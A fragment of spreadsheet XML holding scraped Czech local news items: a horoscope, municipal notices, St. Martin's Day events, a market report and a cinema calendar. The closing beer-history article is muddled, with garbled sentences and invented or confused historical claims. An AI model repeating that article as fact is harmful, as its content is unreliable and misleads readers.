    <t>Denní horoskop na 1.11. 2024: Blíženci mohou vyhrát v loterii, Berani se mohou rozhodnout pro nové začátky Publikováno: 1. listopadu 2024, 05:00 Foto: sarayut / Depositphotos Doba čtení: 3 min Denní horoskop přináší odpověď na otázku: jaká bude naše budoucnost? Náš denní horoskop vám pomůže plně využít příležitosti, které se nám staví do cesty. Pomůže usnadnit plánování života, učinit rozhodnutí, přijmout výzvy nebo se naopak držet zpátky. Beran (21. března - 19. dubna) Milí Berani, dnes se nebojte „opřít“ o svou rodinu, bude Vám nápomocná ve všech záležitostech, které potřebujete napravit. Udělejte za vším tlustou čáru a začněte od začátku. Býk (20. dubna - 20. května) Milí Býci, zaměřte se dnes na svůj partnerský život a nenechte vstoupit nudu do Vašeho života. Oživte vztah pro spokojenost obou stran. Blíženci (21. května - 20. června) Milí Blíženci, čeká Vás úspěšný den. Nejen, že můžete vyhrát v loterii, ale i v lásce si užíváte pozornost a důvěru. Rak (21. června - 22. července) Milí Raci, v práci se držte zpátky a zanechte rozepře s Vaším nadřízeným. Nikam to nepovede. S Vaším protějškem si doma užijte vzájemné přítomnosti. Romantika bude v plném proudu. Raci, doma si užijte s partnerem romantiku, dnes je ideální den | Zdroj: VitalikRadko / Depositphotos Lev (23. července - 22. srpna) Milí Lvi, zapomeňte na starosti všedního dne a rutinu, dnes Vás čeká malé překvapení. Využijte dostatek energie, i v práci se Vám bude dařit. Panna (23. srpna - 22. září) Milé Panny, dnes Vás čeká milé pozvání, rozhodně ho neodmítejte. Budete mile překvapeni, jak hezký den si můžete užít. Ideální den pro nezadané. Pro dnešek se zdržte alkoholu . Související článek Horoskop štěstí na září: Dostaneme odpovědi na spoustu otázek A je tady září. Pomaličku se loučíme s vlahými letními měsíci a obracíme svou pozornost na padající listí a blížící se změnu ročního období. Vyplatí… Váhy (23. září–22. října) Milé Váhy, nevyhlížejte za každým rohem katastrofu. Nedělejte si zbytečné starosti. V lásce se otevřete a zapomeňte na spory. Štír (23. října - 22. listopadu) Milí Štíři, zapomeňte na chmury a nelitujte se. Vyrazte do společnosti, dost možná, že potkáte někoho zajímavého. Hvězdy jsou Vám plně nakloněny. Střelec (22. listopadu - 21. prosince) Milí Střelci, nic není tak horké, jak se uvaří. Zachovejte chladnou hlavu, každá situace má své řešení. Odpočiňte si ve společnosti Vašeho partnera. Související článek Velký horoskop lásky na září: Náš milostný život se pohne tím správným směrem Jak se v září 2024 hvězdy zachovají, aby nabídly zajímavé vhledy do záležitostí srdce každého slunečního znamení? Máme pro vás předpověď měsíčního… Kozoroh (22. prosince - 19. ledna) Milí Kozorozi, pusťte se dnes i do náročných aktivit. Hvězdy přejí nejen v pracovní sféře. Zvolněte a užívejte si přítomnost partnera, posílíte vztah a užijete si romantický večer. Vodnář (20. ledna - 18. února) Milí Vodnáři, čeká Vás úspěšný den. Už dlouho jste se necítili tak dobře, využijte toho. V rámci zdraví zvolněte, dopřejte si relaxaci a uvolnění. Ryby (19. února – březen) Milé Ryby, prokažte pro jednou svou romantickou stránku. Sami budete ohromeni na reakci Vašeho protějšku. V zaměstnání si srovnejte priority, odsuňte projekty, které snesou odklad. Šetřete se. Zdroje článku: Autor: Lucie Farská Autor person Lucie Farská</t>
  </si>
  <si>
    <t>36690</t>
  </si>
  <si>
    <t>3400</t>
  </si>
  <si>
    <t>20241101_476_3241506384_90887011caf67e98bd90.html</t>
  </si>
  <si>
    <t>90887011caf67e98bd90</t>
  </si>
  <si>
    <t>Rumun žijící na ulici odjel zpět do rodné země</t>
  </si>
  <si>
    <t>Rumun žijící na ulici odjel zpět do rodné země Projekt Cesta z ulice, který v Mladé Boleslavi už několik let pomáhá lidem bez domova, si 3. října připsal další úspěch. Z města totiž odcestoval další muž, který zde už dva roky žil na ulici, protože se mu nepodařilo udržet si práci. Díky dobře nastavené a fungující spolupráci odboru bezpečnosti a prevence kriminality, městské policie, Policie ČR, azylového střediska Naděje a psychiatrické nemocnice Kosmonosy se podařilo v rekordní době od okamžiku, kdy o to muž projevil zájem, sehnat mu všechny potřebné doklady a obstarat jízdenku do Rumunska . Rumunský občan je zosobněním toho, jak se cizinec v Mladé Boleslavi ocitne na ulici. Přicestoval k nám za prací v roce 2022, ovšem místo předem zajištěno neměl. Obešel několik personálních agentur, jedna z nich mu práci obstarala, nicméně dlouho v ní nevydržel, protože začal mít problémy s alkoholem . Roztočil se tedy kolotoč krátkodobého zaměstnání přes agenturu, výpovědi kvůli opilosti a života na ulici. V době, kdy pobýval na ulici jako osoba bez domova, žil pouze z darů a toho, co získal u místních neziskových organizací. „Bohužel v této době v několika případech spáchal protiprávní jednání, což řešila nejen městská policie, ale dokonce byl vyšetřován i Policií ČR, když svým jednáním způsobil hmotnou škodu na cizím majetku. Celá situace vyústila jeho hospitalizací v psychiatrické nemocnici na oddělení A12,“ popsal vedoucí odboru bezpečnosti a prevence kriminality Vladislav Král . Už při pobytu na psychiatrii mu nabídli pomoc s návratem do rodné vlasti, kde by měl šanci se uplatnit, nicméně on to odmítl. Po propuštění z Kosmonos se vrátil na ulici a tvrdil, že se snaží najít práci. To se mu však nepovedlo, a to i vzhledem k tomu, že neumí česky, a navíc nemá žádný doklad totožnosti, protože ho kdysi ztratil. Následně tedy vyhledal pomoc na odboru bezpečnosti a prevence kriminality s tím, že by chtěl pomoci s odjezdem do Rumunska . Vše se nakonec podařilo zařídit v rekordně krátkém čase v řádu několika hodin, které uplynuly od sepsání žádosti o pomoc přes ověření totožnosti osoby a zajištění potvrzení o totožnosti osoby až po samotný odjezd z Jičína do Vídně a odtud do rumunského Brašova . Vzhledem k jazykové bariéře bylo nutné ke všem úkonům zajistit také tlumočníka a samozřejmě překlady všech dokumentů. Projekt Cesta z ulice už pomohl 102 lidem bez domova.</t>
  </si>
  <si>
    <t>20241101_477_3241497286_3cf3481cd074c57adc2b.html</t>
  </si>
  <si>
    <t>3cf3481cd074c57adc2b</t>
  </si>
  <si>
    <t>Grantový program pro rok 2025</t>
  </si>
  <si>
    <t>Grantový program pro rok 2025 Rada města Mladá Boleslav vyhlásila podávání žádostí do Grantového programu pro rok 2025 na podporu využití volného času. Žádosti lze podávat od 4. listopadu do 22. listopadu 2024 do 14:00 hodin. Žádosti jsou určeny pouze na akce s termínem konání od 1. ledna 2025 do 31. prosince 2025 včetně. Předpokládaný celkový objem finančních prostředků vyčleněných na Grantový program pro rok 2025 je jeden milion korun. Žádosti můžete podat pouze v elektronické podobě prostřednictvím dotačního portálu Grantys na internetových stránkách www.mb.grantys.cz. V rámci grantového programu může podat jeden žadatel maximálně dvě žádosti. Žadatel, který podá více žádostí, bude z grantového programu vyřazen a žádné jeho žádosti nebudou dále projednávány. Kofinancování projektu ze strany žadatele musí činit v žádosti minimálně 20 procent z částky požadovaného grantu. V případě, že tato podmínka nebude dodržena, nebude daná žádost dále projednávána. V konečném vyúčtování musí činit výše kofinancování z prostředků žadatele minimálně 20 procent z poskytnuté dotace. Jeden projekt (žádost) může získat grant maximálně do výše 50 000 Kč. Projekt (žádost), který bude požadovat dotaci vyšší než 50 000 Kč, nebude projednáván. Konečná výše přiznaných finančních prostředků je odvislá od výše schválených prostředků v rozpočtu města. Dotace jsou poskytovány výhradně na neinvestiční výdaje související s realizací projektů. Z dotace není možné hradit údržbu a opravy majetku, cesty do zahraničí, platy a povinné odvody (nevztahuje se na dohody o provedení práce a pracovní činnosti), pohoštění, stravné, peněžní dary, telefonní služby, leasing, úvěry a půjčky, alkohol , tabákové výrobky a jiné návykové látky. V případě, že příjemce dotace je plátce DPH, není oprávněn hradit z dotace DPH. O grant mohou žádat právnické osoby zapsané ve veřejném rejstříku (např. zejména spolky, dále pak nadace a nadační fondy, ústavy, obecně prospěšné společnosti, obchodní společnosti apod.) a fyzické osoby. Žadatel o grant musí být zároveň organizátorem akce či projektu. Podpora z grantového programu je určena pro aktivity typu: A. Festivaly – divadelní, filmové, hudební. B. Besedy a přednášky. C. Volnočasové aktivity pro veřejnost. D. Umělecké aktivity – výtvarné a hudební projekty, výstavy. E. Aktivity pro seniory a osoby se zdravotním postižením. F. Ekologická výchova a péče o životní prostředí. V rámci grantového programu nebudou podporovány: A. Akce komerčního charakteru, jejichž ekonomickým výsledkem je zisk. B. Činnosti organizací, které jsou řešeny z jiných zdrojů rozpočtu města. C. Akce pořádané v rámci činnosti žadatele pro jeho členy. D. Akce/projekt, který se koná mimo území Mladé Boleslavi . E. Sportovní akce a závody. Další podrobnosti najdete na stránkách města v sekci Témata – Poplatky, dotace, granty a finance. S PODPOROU GRANTU MĚSTA se v roce 2024 konal i například Templfest. Foto Zdeněk Kolín</t>
  </si>
  <si>
    <t>20241101_478_3241506396_3ed3f1b651a2bbf1f855.html</t>
  </si>
  <si>
    <t>3ed3f1b651a2bbf1f855</t>
  </si>
  <si>
    <t>Sv. Martin už se chystá do Chaber</t>
  </si>
  <si>
    <t>Sv. Martin už se chystá do Chaber Přijede letos sv. Martin na bílém koni, nebo ne? Bílého prý letos nesehnal, ale věříme, že dětské oči rozzáří i krásný černý kůň a zima ještě chvíli počká. Sejdeme se v neděli 10. 11. v 16:15 hodin u komunitního centra Moringa Tree Club v Nových Chabrech. Krátce si o tomto světci něco povíme a pak už ho budeme společně vyhlížet. Po hlazení koní se při západu slunce projdeme po panelce Beranovce v průvodu s lampiony. S sebou: mrkev, jablko pro koně, něco milého, dobrého, pitného jako poděkování pro parťáky ze Zrzavého ranče, cokoliv, o co se vaše dítě dokáže rozdělit s druhými (ovoce, sladkost, hračka, aj.), lampion, příp. zapalovač. A snad se ještě podaří: pro děti společné pečení svatomartinských rohlíčků, pro dospělé večerní degustace vína . Pro více informací sledujte sociální sítě městské části. Za milou spolupráci děkuji Katce a Jakubovi ze Zrzavého ranče a Vlaďce z Moringa Tree Club. Těší se na vás Autor: Věra Novotná Autor person Věra Novotná</t>
  </si>
  <si>
    <t>2400</t>
  </si>
  <si>
    <t>20241101_479_3241506390_1637e5a2d73a01d67262.html</t>
  </si>
  <si>
    <t>1637e5a2d73a01d67262</t>
  </si>
  <si>
    <t>Zuzana Stírská a Karel Voříšek na Kráse zralého věku</t>
  </si>
  <si>
    <t>Zuzana Stírská a Karel Voříšek na Kráse zralého věku Tito dva protagonisté tvoří naši upoutávku na blížící se další setkání seniorů, jsou dokonalými hosty a máme se s nimi na co těšit: krásný silný hlas zpěvačky a charismatický melodický hlas moderátora. Jako bonus k tombole a ochutnávce vína beaujolais přijde i milé překvapení. Pozor! Místa v sále se rychle zaplňují, kdo ještě nemá své místo, využijte možnosti rezervace. Kráse a noblese vzdáme hold dne 20. listopadu 2024 v čase zahájení 14:30 hodin Rezervace: Jitka Goldsteinová, tel.: 283 852 858, mob.: 604 976 653. Autor: HaMaKu</t>
  </si>
  <si>
    <t>20241101_48_3265227355_e04ed15e847432108bef.html</t>
  </si>
  <si>
    <t>e04ed15e847432108bef</t>
  </si>
  <si>
    <t>Fronta na burrito v Holešovicích byla děsivější než halloweenské masky</t>
  </si>
  <si>
    <t>Fronta na burrito v Holešovicích byla děsivější než halloweenské masky REPORTÁŽ: Ve čtvrtek 31. října se Holešovická tržnice tradičně proměnila v halloweenský mexický trh. Třetí ročník oslav mexického svátku mrtvých Día de los Muertos přilákal davy lidí, velké množství z nich dokonce ve strašidelných maskách. Největším lákadlem bylo mexické jídlo a hudba. Akce začala už v 11 hodin dopoledne. Program nabídl přibližně dvacítku stánků servírujících tradiční mexické jídlo, ale i koktejly nebo pivo . My jsme na místo dorazili krátce po 17. hodině večer, tedy už za tmy. Atmosféra byla výborná, kromě barevné výzdoby zaujala mexická hudba linoucí se nejen z pultu DJ, ale také od jednotlivých stánků. Už při příchodu bylo jasné, že tržnice bude narvaná. Z tramvají vystupovaly davy lidí, mnozí dokonce v kostýmech. Nejen děti, ale i dospělí dorazili v oblečení připomínajícím mexický svátek Día de los Muertos, ale i další strašidelné postavy z filmů či knih. U jednotlivých stánků se tvořily dlouhé fronty, místy se mezi nimi pomalu nedalo ani projít. Těžké pak bylo se probojovat i k nabídce některých stánků, protože byla skryta za čekajícími lidmi. Obsazeny byly také všechny stoly, lavičky a dokonce i obrubníky a další místa, která se dala využít k sezení. Tržní náměstí bylo doslova plné k prasknutí. Ceny jídla se pohybovaly kolem 200 korun za porci. Výběr byl pestrý a na své si přišel opravdu každý. Valná většina stánků navíc brala platební karty. Rovné dvě stovky stálo například chilli con carne s nachos, quesadilla s trhaným vepřovým masem nebo vegetariánská quesadilla. Za 210 korun bylo možné si pochutnat na BBQ vepřové nebo sýrové quesadille a ještě o 40 korun více stála mexická hovězí miska obsahující trhaný hovězí krk, avokádovou salsu, rýži či fazole. Nechybělo ani velké množství nápojů a to jak alkoholických, tak nealkoholických. Studených i teplých. Asi nejoblíbenější koktej spojovaný s mexickou kuchyní, frozen margarita, byl v různých stáncích k dostání za zhruba 150 až 200 korun za skleničku. Každý prodejce navíc nabízel různé příchutě, například jahodu, mango nebo malinu. Nechyběla ani limonáda za 70 korun či velké pivo s podobnou cenovkou. Sklenice svařáku či teplého jablka stála 60 korun. REPORTÁŽ: PrahaIN.cz navštěvuje vietnamskou Sapu pravidelně. Nicméně jsme trochu opomíjeli místní gastronomii, za kterou se sem sjíždějí lidé… My jsme si z pestré nabídky vybrali burrito, tedy tortillu plněnou fazolemi, rýží, masem a sýrem za 220 korun. Překvapilo nás, že zrovna tento ikonický pokrm jsme našli v nabídce pouze jediného stánku a s naší smůlou zrovna toho, kde se klikatila úplně nejdelší fronta. Na burrito jsme měli ale opravdu chuť, a tak jsme se na její konec postavili. Že budeme čekat poměrně dlouho, jsme věděli, se 40 minutami ve frontě jsme ale opravdu nepočítali. Dlouhé čekání způsobil částečně i zmatek přímo ve stánku, kde prodejci často na několik minut přestali brát objednávky a jen vydávali. Někteří lidé pak ve všeobecném hluku neslyšeli své vyvolávané číslo a malér byl na světe. Fronta proto dlouhou dobu jen stála a na jejím konci přibývali další a další lidé. V jednu chvíli to skoro vypadalo, že se k pokrmu vůbec nedostaneme. Po zhruba 30 minutách jsme se konečně dostali na řadu a objednali jsme si jedno burrito s trhaným vepřovým masem na pomerančích a jedno s trhaným kuřecím masem s cibulkou a rajčaty. Pak už jsme na jídlo čekali jen zhruba 10 minut. Drobný problém představovalo ještě nalezení místa k sezení. Jak jsme již v úvodu článku avizovali, všechny stoly i lavičky byly obsazené. Nakonec jsme jako sedačku improvizovaně použili jakousi římsu. Rozhodně jsme nebyli jediní. Když jsme burrito konečně ochutnali, dlouhého čekání jsme naštěstí nelitovali. Jídlo bylo výborné, i když o něco více nám chutnala varianta s vepřovým masem. Příště bychom možná ocenili také nějakou omáčku přímo v tortille, protože dipy byly k dispozici pouze zvlášť. Na výběr ale bylo ze čtyř a všechny byly moc dobré, bohužel jsme si jich ale naservírovali poměrně málo a už se nám pro ně nechtělo davem lidí znovu vracet. I tak hodnotíme pokrm na jedničku. Z jedné porce se bohatě navečeřel i velký jedlík. Akce však nebyla jen o jídle. Haly 13 a 14 se na celý den proměnily v mexickou tržnici, kde bylo kromě potravin k dispozici také množství tradičních latinskoamerických výrobků a suvenýrů. Návštěvníci si mohli vyrobit vlastní masky či květinové korunky nebo si nechat pomalovat obličej. Autor: Adéla Houbová Autor person Adéla Houbová</t>
  </si>
  <si>
    <t>20241101_480_3241506389_5b55ed60d9f4e3e66635.html</t>
  </si>
  <si>
    <t>5b55ed60d9f4e3e66635</t>
  </si>
  <si>
    <t>Říjnová kavárnička ožila</t>
  </si>
  <si>
    <t>Říjnová kavárnička ožila Na začátek je třeba uvést, že naše fyzioterapeutka Erika Havlasová, která měla být hostem této kavárničky, se omluvila ze zdravotních důvodů, ale… náhradní program a cvičení v režii Stáni Klocperkové její nepřítomnost plně vyvážily. Kdo přišel, nenudil se, kdo nemohl, přijde určitě příště. Kdo by si nechal znovu ujít dobrou náladu, protažení těla a dobití svých baterek pozitivní energií? Děkujeme všem, kdo nám vytvořili úžasné prostředí v naší knihovně. Dáme o sobě znovu vědět a těšíme se s vámi na další setkání u kávy a sklenky vína . Sledujte náš Zpravodaj. Krásné dny jménem celé Kulturní a sociální komise přeje Autor: Hana Marie Kunešová Autor person Hana Marie Kunešová</t>
  </si>
  <si>
    <t>20241101_481_3241497189_a62bf4d9468d03fb8977.html</t>
  </si>
  <si>
    <t>a62bf4d9468d03fb8977</t>
  </si>
  <si>
    <t>Chaberský ZPRAVODAJ</t>
  </si>
  <si>
    <t>Chaberský ZPRAVODAJ pravidelný měsíčník MČ Praha - Dolní Chabry 2 Poděkování za sbírku akce pro dárce v kostele 4 Reuse day nový život starým věcem 11 Setkání v Chabrybárně buřty, pivo a povídání Zažít Chabry jinak děkujeme, že jste přišli a užili si skvělé odpoledne www.dchabry.cz</t>
  </si>
  <si>
    <t>20241101_482_3241356068_8ac739c40ff616a98ed8.html</t>
  </si>
  <si>
    <t>8ac739c40ff616a98ed8</t>
  </si>
  <si>
    <t>KALENDÁR ˇ AKCÍ</t>
  </si>
  <si>
    <t>KALENDÁR ˇ AKCÍ KINO 1. LISTOPADU, 20:00 TAJEMSTVÍ SMRTI 2. LISTOPADU, 17:30 ŽIVOT K SEŽRÁNÍ 2. LISTOPADU, 20:00 POKLAD 3. LISTOPADU, 15:00 BUFFALO KIDS 6. LISTOPADU, 19:00 VÝJIMEČNÝ STAV 7. LISTOPADU, 19:00 AMERIKÁNKA 8. LISTOPADU, 20:00 VLNY 9. LISTOPADU, 17:30 MOJE KOUZELNÁ RODINKA 9. LISTOPADU, 20:00 ROK VDOVY 10. LISTOPADU, 15:00 PYŠNÁ PRINCEZNA 13. LISTOPADU, 10:00 DOPOLEDNÍ PROMÍTÁNÍ ZAHRADNÍKŮV ROK 13. LISTOPADU, 19:00 JEŠTĚ NEJSEM, KÝM CHCI BÝT 14. LISTOPADU, 19:00 TAJEMSTVÍ SMRTI 15. LISTOPADU, 20:00 VÝJIMEČNÝ STAV 16. LISTOPADU, 20:00 GLADIÁTOR II 17. LISTOPADU, 10:00 KOUZELNICKÁ SHOW S JIRKOU HADAŠEM 17. LISTOPADU, 15:00 PYŠNÁ PRINCEZNA 19. LISTOPADU, 18:00 CESTOPIS. PŘEDNÁŠKA JEDLÍCI NA CESTÁCH 20. LISTOPADU, 19:00 POKLAD 21. LISTOPADU, 19:00 VLNY 22. LISTOPADU, 20:00 GLADIÁTOR II 23. LISTOPADU, 20:00 VANDRÁCI NA OSTROVĚ LIDOJEDŮ 24. LISTOPADU, 15:00 SOBÍK NIKO: CESTA ZA POLÁRNÍ ZÁŘÍ 27. LISTOPADU, 10:00 DOPOLEDNÍ PROMÍTÁNÍ JANŽURKA 27. LISTOPADU, 19:00 ARCHITEKTURA ČSSR 58-89 28. LISTOPADU, 19:00 GLADIÁTOR II 29. LISTOPADU, 20:00 POKLAD 30. LISTOPADU, 17:30 VANDRÁCI NA OSTROVĚ LIDOJEDŮ 30. LISTOPADU, 20:00 VÝJIMEČNÝ STAV DIVADLO 2. LISTOPADU, 15:00, DIVADELNÍ PŘEDSTAVENÍ PRO DĚTI HONZA MÁLEM KRÁLEM 12. A 15. LISTOPADU, 19:00, DIVADELNÍ PŘEDSTAVENÍ S TVOJÍ DCEROU NE 14. LISTOPADU, 19:00, BESEDA VEČER S ONDŘEJEM VETCHÝM 20. LISTOPADU, 19:00, KONCERT PROJEKT DVOŘÁK 28. LISTOPADU, 19:00, DIVADELNÍ PŘEDSTAVENÍ OKO TYGRA MUZEUM 9. LISTOPADU, 10:00, HŘBITOV MNICHOVO HRADIŠTĚ VÝZNAMNÍ ZESNULÍ 2024 KLUB DĚTÍ A MLÁDEŽE 2. LISTOPADU, 17:30 AŽ 19:00 DUCHOVÉ A DUŠIČKY V ZÁMECKÉ ZAHRADĚ 5. LISTOPADU, 17:00 AŽ 19:00, PŘIHLÁŠKY DO 4. LISTOPADU KERAMICKÁ DÍLNA PRO VEŘEJNOST MH 9. LISTOPADU, 9:00 AŽ 13:00, PŘIHLÁŠKY DO 7. LISTOPADU KURZ ŠITÍ PRO DĚTI I DOSPĚLÉ 12. A 26. LISTOPADU, 17:15 AŽ 21:15 VEČER S DUNGEONS &amp;amp; DRAGONS 23. LISTOPADU, 10:00 AŽ 16:00 SOBOTA S DUNGEONS &amp;amp; DRAGONS 26. LISTOPADU, 17:00 AŽ 19:00, PŘIHLÁŠKY DO 25. LISTOPADU KERAMICKÁ DÍLNA PRO VEŘEJNOST MH 4., 11., 18. A 25. LISTOPADU, 9:00 AŽ 11:00 PONDĚLNÍ DOPOLEDNÍ HERNIČKA 5., 12., 19. A 26. LISTOPADU, 9:00 AŽ 11:00 KLUB SLUNÍČKO 6., 13., 20. A 27. LISTOPADU, 9:00 AŽ 11:00 MINIŠKOLKA 2 (STŘEDA) 7., 14., 21. A 28. LISTOPADU, 9:00 AŽ 11:00 KLUB KORÁLEK 7., 14., 21. A 28. LISTOPADU, 9:00 AŽ 11:00 DOPOLEDNÍ KERAMICKÝ KLUB 1., 8., 15., 22. A 29. LISTOPADU, 8:30 AŽ 11:30 MINIŠKOLKA 3 (PÁTEK) ADVENT 1. PROSINCE, 16:00 MASARYKOVO NÁMĚSTÍ ROZSVÍCENÍ VÁNOČNÍHO STROMU 5. PROSINCE, 17:00 MASARYKOVO NÁMĚSTÍ ČERTOVÁNÍ S MIKULÁŠSKOU NADÍLKOU 7. PROSINCE, 9:00 AŽ 17:00 MASARYKOVO NÁMĚSTÍ VÁNOČNÍ JARMARK CENTRUM NÁRUČ 1. LISTOPADU, 10:00, VOLNOČASOVÉ CENTRUM DENTÁLNÍ HYGIENA 5., 12., 19. A 26. LISTOPADU, 11:00, VOLNOČASOVÉ CENTRUM KONVERZACE S RODILOU MLUVČÍ 5. LISTOPADU, 17:00, VOLNOČASOVÉ CENTRUM ŽENSKÝ KRUH „ZDROJE: CO MĚ V ŽIVOTĚ VYŽIVUJE, CO MĚ SYTÍ“ 8. LISTOPADU, 10:00, VOLNOČASOVÉ CENTRUM JAK NEVYHOŘET V PARTNERSKÉM VZTAHU S MALÝMI DĚTMI 12. LISTOPADU, 17:00, VOLNOČASOVÉ CENTRUM SEZNÁMENÍ S PORODNICÍ V MB 15. LISTOPADU, 10:00, VOLNOČASOVÉ CENTRUM JAK SE UVOLNIT V MATEŘSTVÍ 22. LISTOPADU, 10:00, VOLNOČASOVÉ CENTRUM NÁRUČ PLNÁ KNIH 26. LISTOPADU, 17:00, VOLNOČASOVÉ CENTRUM ADVENTNÍ VĚNCE 29. LISTOPADU, 17:00, VOLNOČASOVÉ CENTRUM ADVENTNÍ SPIRÁLA OSTATNÍ DO 28. ÚNORA 2025, NÁBYTEK HONZA ( VÍTA NEJEDLÉHO 1299) VÝSTAVA FOTOGRAFIÍ, KRESEB A GRAFIKY M. BACHOVÉ 2. LISTOPADU, 19:30, KAFÉ OŘECH ZLO Z JIHU 4. LISTOPADU, 17:00, KOMUNITNÍ CENTRUM MÍROVÁ VEŘEJNÉ ZASEDÁNÍ ZASTUPITELSTVA MĚSTA 6. A 20. LISTOPADU, 15:00, ZASEDACÍ MÍSTNOST MĚSTS. ÚŘADU KONZULTACE ARCHITEKTA MĚSTA S VEŘEJNOSTÍ 11. LISTOPADU, 17:00, MASARYKOVO NÁMĚSTÍ A FARNÍ ZAHRADA SVATOMARTINSKÝ PRŮVOD 12. LISTOPADU, 17:30, DŮM LUDMILA, VESELÁ, NA NÁVSI 229 SCHŮZKA MNICHOVOHRADIŠŤSKÉHO SPOLKU GENEALOGŮ SPORT 9. LISTOPADU, SOKOLOVNA MNICHOVO HRADIŠTĚ , STOLNÍ TENIS SOKOL MH – TTC ELIZZA PRAHA C (14:00, 6. kolo 2. ligy sk. A) SOKOL MH – AERO ODOLENA VODA A (17:00, 6. kolo KS2 A) SOKOL MH – SLAVOJ OBECNICE A (17:00, 6. kolo Divize) 10. LISTOPADU, SOKOLOVNA MNICHOVO HRADIŠTĚ , STOLNÍ TENIS SOKOL MH – TJ SLAVOJ PRAHA (10:00, 7. kolo 2. ligy sk. A) SOKOL MH – SOKOL VŠETATY A (10:00, 7. kolo KS2 A) SOKOL MH – SKC ZRUČ N. SÁZ. TENNISLINE A (13:00, 7. kolo Divize)</t>
  </si>
  <si>
    <t>3500</t>
  </si>
  <si>
    <t>20241101_483_3241356069_1c681fa2f376b49ab9c5.html</t>
  </si>
  <si>
    <t>1c681fa2f376b49ab9c5</t>
  </si>
  <si>
    <t>Podzim u Jizery: vodáci řeku uzamkli, tenisté vztyčili nafukovací halu</t>
  </si>
  <si>
    <t>Podzim u Jizery: vodáci řeku uzamkli, tenisté vztyčili nafukovací halu Některé události se vrací s železnou pravidelností a připomínají nám, jak zběsile čas pádí dopředu... Jako by to bylo včera, kdy parta nadšenců symbolicky odemykala Jizeru a vítala novou sezónu. V polovině října se Na Kamínkách sešlo 22 účastníků, kteří nasedli na 14 plavidel a vydali se na společnou jízdu po proudu. Někteří k lávce u Kofoly, další až k novému silničnímu mostu na Klášter. Na zpáteční cestě je vítala slavnostní melodie trumpety, na kterou na skále na židovském hřbitově zahrál na pozdrav všem plujícím Miroslav Hrdina. Následovalo uzamčení Jizery , o které se postaral Jiří Kafka , a společné posezení nad pivem a sekanou v klubovně tenisového klubu. Také mnichovohradišťští tenisté se připravili na zimní část sezóny – vztyčením nafukovací tenisové haly. Její přípravě věnovali v polovině října několik dní. Nejprve byl položen hrací povrch, v sobotu 20. října pak od rána probíhala samotná stavba, jíž se zúčastnily tři desítky lidí. O to, aby brigádníkům nedošly síly, se postaral předseda Tenisového klubu Mnichovo Hradiště Pavel Hron, který navařil vynikající guláš. (wes) Příchod podzimu u Jizery, na pláži i na tenise. Foto: Václav Vopat st.</t>
  </si>
  <si>
    <t>20241101_484_3241345266_282dd0fef926a099c334.html</t>
  </si>
  <si>
    <t>282dd0fef926a099c334</t>
  </si>
  <si>
    <t>Hledáte prostory pro podnikání? Mukařov nabízí objekt v Borovici</t>
  </si>
  <si>
    <t>Hledáte prostory pro podnikání? Mukařov nabízí objekt v Borovici Obec Mukařov nabízí k pronájmu objekt bývalých potravin v Borovici čp. 15. Nebytové prostory určené k podnikání mají rozlohu 125 m2 a k dispozici jsou od 1. prosince. Jedná se o prostor prodejny, sociální zařízení a sklad. Měsíční nájemné činí 250 Kč. Zájemci mohou své nabídky doručit na Obecní úřad Mukařov do 15. listopadu 2024. Součástí musí být jméno a příjmení, nebo obchodní jméno, kontaktní údaje, kopie živnostenského listu nebo výpisu z obchodního rejstříku, případně koncese na prodej alkoholu a lihovin a také popis podnikatelského záměru. Obálka by měla být označena: „Nájem prostor bývalé prodejny Borovice – NEOTVÍRAT“. Prostory je možné si prohlédnout po domluvě se starostou obce Vojtěchem Biskupem. Více informací na tel. 775 953 409 nebo e-mailu oumukarov@centrum.cz. (wes)</t>
  </si>
  <si>
    <t>20241101_485_3241345146_24c028add6a9e6c3e02b.html</t>
  </si>
  <si>
    <t>24c028add6a9e6c3e02b</t>
  </si>
  <si>
    <t>Svatomartinský průvod</t>
  </si>
  <si>
    <t>Svatomartinský průvod Ani letos nepřijdeme o oblíbenou akci, která ještě před zahájením adventu rozzáří Masarykovo náměstí. V pondělí 11. listopadu bude možné se na náměstí v 17 hodin potkat se svatým Martinem na bílém koni, patronem vojáků, koní, hus a vinařů, v jehož stopách zamíří průvod na faru. Příběh původně římského vojáka, který se stal poustevníkem a později biskupem obracejícím pohany na křesťanství a konajícím zázraky, přiblíží farář Pavel Mach. Cestou na faru budou kostýmovaní účastníci svítit loučemi, děti se mohou vybavit lampiony. Na faře bude připravené bohaté občerstvení, horký čaj a svařené víno pro zahřátí a k dobré náladě přispěje svým uměním středověká kapela Gnomus. Pořadateli akce jsou město, Klub a spolek Žijeme pro Hradiště. (wes)</t>
  </si>
  <si>
    <t>20241101_486_3241185797_60060dba74cf9f61823c.html</t>
  </si>
  <si>
    <t>60060dba74cf9f61823c</t>
  </si>
  <si>
    <t>Tajná historie piva, kterou byste neměli ignorovat, pokud vám záleží na tom, co pijete</t>
  </si>
  <si>
    <t>Tajná historie piva , kterou byste neměli ignorovat, pokud vám záleží na tom, co pijete autor: Redakce Nezdrave.cz | 01.11.2024 | Chlast V dnešní době, kdy se všichni snažíme být trendy a cool, zanedbáváme příběh, který se skrývá za našimi milovanými nápoji. Obzvlášť pivo , ten zlatavý nektar, který nás doprovází na večírky, barové sešlosti i u grilování na zahradě, má fascinující minulost, jež sahá až do starověkého Egypta . Kdo by to řekl, že si naši předkové na stěnách chrámů u líbivého chmelového moku při práci za největší tajemství zachovali? To je totiž teprve začátek! Věděli jste, že pivo je starší než mnoho velkých civilizací? Ano, slyšíte dobře! Předtím, než vás chytili do svých sítí Romové, Vikingové či Egypťané, nám byl známý zvláštní nápoj, který z dávného obilí vyčaroval. Zdá se, že už v roce 6000 před naším letopočtem, v Mezopotámii, si lidé užívali toto zázračné elixír i když pravděpodobně neměli suché lednice a trendy skleničky. Kdo ví, kolik jich skončilo na čelních stránkách místních bublinových novin s titulky „Lidi, co to máte za hnus?!“? Andělské hody a barové šílenství A teď si představte – pivo , oblíbený nápoj dolních vrstev, bylo kdysi elitní záležitostí. V dávných dobách si králové a bohatí šlechtici dávali pivo k jakýmkoliv svátkům, zatímco lidé z ulice s nimi mohli jen přihlížet a snít o svém „hâăl-ya“ (což je staroamerická známka na dnešní „hug life“). V současnosti se všichni kroutí jak celebrity na Instagramu a studují každý detail o craft pivech , ale bylo by zajímavé vidět, jak by se představy o pití zlatého moku proměnily, kdyby naši předci měli přístup k dnešním „hypem“ labelům. Jak se to stalo, že se hliněné nádoby s nápojem staly součástí našich povýšených posiloven? Trendy se mění jako počasí, a to, co se kdysi považovalo za luxus, se nyní vejdou do našich šatníků jako obyčejné triko od H&amp;amp;M. 